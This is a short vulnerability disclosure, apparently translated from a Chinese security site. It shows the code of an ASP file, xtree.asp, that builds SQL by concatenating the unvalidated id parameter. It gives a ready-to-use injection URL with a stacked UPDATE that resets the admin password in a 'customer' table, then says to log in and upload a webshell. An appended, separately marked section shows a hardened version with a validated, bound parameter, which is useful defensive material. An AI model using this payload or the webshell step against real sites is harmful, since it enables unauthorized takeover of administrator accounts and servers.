Source: 自学PHP网  Time: 2015-04-17 13:03
Vulnerable file: webmedia/common/function/xtree.asp
<!--#include file="../dbcon.inc.asp" -->
<%
' The id parameter is read from the query string without any validation
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
    ' Admin sessions: iNode_ID is concatenated straight into the SQL text
    szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>=20 AND ParentID=" & iNode_ID
else
    ' Everyone else, including unauthenticated visitors: same concatenation
    szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
' Build the XML tree response from the result set
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
    szRetVar = szRetVar & "<TypeInfo>"
    szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
    szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
    szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&amp;") & "</TypeName>"
    szRetVar = szRetVar & "</TypeInfo>"
    rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
' Response.C   (statement truncated in the source page)
Response.Expires = -1
Response.Write szRetVar
%>
<!--#include file="../dbend.inc.asp" -->
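It is easy to see that the code above, which concatenates the id parameter directly into the SQL string, is open to SQL injection with DB-level privileges.

Injection URL: http://WWWW.2cto.COM/webmedia/common/function/xtree.asp?id=1

Table name: customer

Construct a statement that changes admin's password to "fuck":

http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

Log in to the admin backend, upload a full-featured webshell directly, and that's it!

Originally compiled by 0day5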
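A hardened form of the same page, as an added example (not from the original article or the vendor's code): the id is validated as a plain decimal integer and bound as an ADO parameter instead of being concatenated. It assumes dbcon.inc.asp provides an open ADODB.Connection named con, as the page's rsData.Open call implies; ParseNodeId, nodeId, rsTree and szXml are hypothetical names.

```asp
<!--#include file="../dbcon.inc.asp" -->
<%
' Added example, not the vendor's code. Assumes dbcon.inc.asp opens an
' ADODB.Connection named con, as the rsData.Open call on the page implies.
' Accept only a plain decimal integer. IsNumeric is too loose for this: it
' also accepts forms such as "&H10", "1e5" and currency strings.
Function ParseNodeId(raw)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If re.Test(raw) Then
        ParseNodeId = CLng(raw)
    Else
        ParseNodeId = -1
    End If
End Function

Dim nodeId, cmd, rsTree, szXml   ' hypothetical names
nodeId = ParseNodeId(Request.QueryString("id") & "")
If nodeId < 0 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = con
cmd.CommandType = 1   ' adCmdText
' An operator cannot be a parameter, so choose between two constant strings.
If Len(Session("SuperAdmin")) > 0 Or Len(Session("LIVEAdmin")) > 0 Or Len(Session("VODAdmin")) > 0 Then
    cmd.CommandText = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>=20 AND ParentID=?"
Else
    cmd.CommandText = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>20 AND ParentID=?"
End If
' The id is bound as a typed integer (adInteger = 3, adParamInput = 1) and is
' never spliced into the SQL text, so "1;update ..." cannot become a statement.
cmd.Parameters.Append cmd.CreateParameter("ParentID", 3, 1, , nodeId)
Set rsTree = cmd.Execute
szXml = "<?xml version='1.0' encoding='GB2312'?><Root>"
Do While Not rsTree.EOF
    szXml = szXml & "<TypeInfo><IDN>" & rsTree("Type_ID") & "</IDN>" & _
        "<ParentID>" & rsTree("ParentID") & "</ParentID>" & _
        "<TypeName>" & Replace(rsTree("TypeName"), "&", "&amp;") & "</TypeName></TypeInfo>"
    rsTree.MoveNext
Loop
rsTree.Close
Response.CharSet = "GB2312"
Response.Expires = -1
Response.Write szXml & "</Root>"
%>
<!--#include file="../dbend.inc.asp" -->
```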